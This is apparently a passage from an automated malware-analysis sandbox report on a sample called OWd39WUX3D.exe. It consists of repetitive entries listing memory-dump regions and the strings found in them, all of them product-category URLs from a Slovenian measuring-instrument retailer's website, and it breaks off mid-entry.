OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/prenosn
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/program
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/radiaci
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/registr
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-brezz
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-seti/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vecka
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vsi/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-za-ex
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/hladna-veriga-in-pr
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/programska-oprema-z
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in 